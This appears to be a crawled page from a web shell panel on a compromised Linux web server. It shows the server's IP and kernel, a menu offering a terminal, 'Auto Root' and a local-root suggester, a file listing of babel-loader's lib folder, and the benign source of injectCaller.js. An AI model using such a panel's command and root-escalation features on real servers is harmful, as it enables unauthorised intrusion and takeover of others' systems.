Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.39.197
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
babel-loader /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
Error.js
801
B
-rw-rw-r--
2022-08-30 11:49
cache.js
5.74
KB
-rw-rw-r--
2022-08-30 11:49
index.js
8.48
KB
-rw-rw-r--
2022-08-30 11:49
injectCaller.js
1.48
KB
-rw-rw-r--
2022-08-30 11:49
schema.json
460
B
-rw-rw-r--
2022-08-30 11:49
transform.js
1.86
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
"use strict"; const babel = require("@babel/core"); module.exports = function injectCaller(opts, target) { if (!supportsCallerOption()) return opts; return Object.assign({}, opts, { caller: Object.assign({ name: "babel-loader", // Provide plugins with insight into webpack target. // https://github.com/babel/babel-loader/issues/787 target, // Webpack >= 2 supports ESM and dynamic import. supportsStaticESM: true, supportsDynamicImport: true, // Webpack 5 supports TLA behind a flag. We enable it by default // for Babel, and then webpack will throw an error if the experimental // flag isn't enabled. supportsTopLevelAwait: true }, opts.caller) }); }; // TODO: We can remove this eventually, I'm just adding it so that people have // a little time to migrate to the newer RCs of @babel/core without getting // hard-to-diagnose errors about unknown 'caller' options. let supportsCallerOptionFlag = undefined; function supportsCallerOption() { if (supportsCallerOptionFlag === undefined) { try { // Rather than try to match the Babel version, we just see if it throws // when passed a 'caller' flag, and use that to decide if it is supported. babel.loadPartialConfig({ caller: undefined, babelrc: false, configFile: false }); supportsCallerOptionFlag = true; } catch (err) { supportsCallerOptionFlag = false; } } return supportsCallerOptionFlag; }